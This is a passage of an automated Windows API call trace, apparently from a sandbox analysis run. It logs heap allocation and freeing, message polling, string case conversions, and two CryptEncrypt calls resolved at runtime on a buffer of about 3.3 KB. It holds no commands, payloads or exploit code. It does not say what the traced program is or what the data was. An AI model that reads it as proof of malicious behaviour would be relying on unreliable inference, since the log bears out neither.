0x24a9ab0 [0256.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a4048 | out: hHeap=0x25c0000) returned 1 [0256.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.778] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0256.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa110, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0256.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.780] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0256.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0256.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0256.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0256.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0256.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0256.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0256.781] CryptEncrypt (in: hKey=0xaa5960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xd25, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xd28) returned 1 [0256.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.783] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.783] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.783] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.783] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.784] CharLowerBuffW (in: lpsz="byte[3368]", cchLength=0xa | out: lpsz="byte[3368]") returned 0xa [0256.784] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.784] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.784] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.784] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0256.784] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.784] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.784] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0256.784] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0256.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0256.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.785] CryptEncrypt (in: hKey=0xaa5960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34a4048*, pdwDataLen=0x8bef68*=0xd25, dwBufLen=0xd28 | out: pbData=0x34a4048*, pdwDataLen=0x8bef68*=0xd28) returned 1 [0256.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0256.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0256.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0256.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0256.785] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0256.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0256.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0256.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0256.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.786] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.786] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0256.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.786] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0256.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0256.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.786] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.786] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0256.787] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0256.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.787] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.787] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.787] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.787] 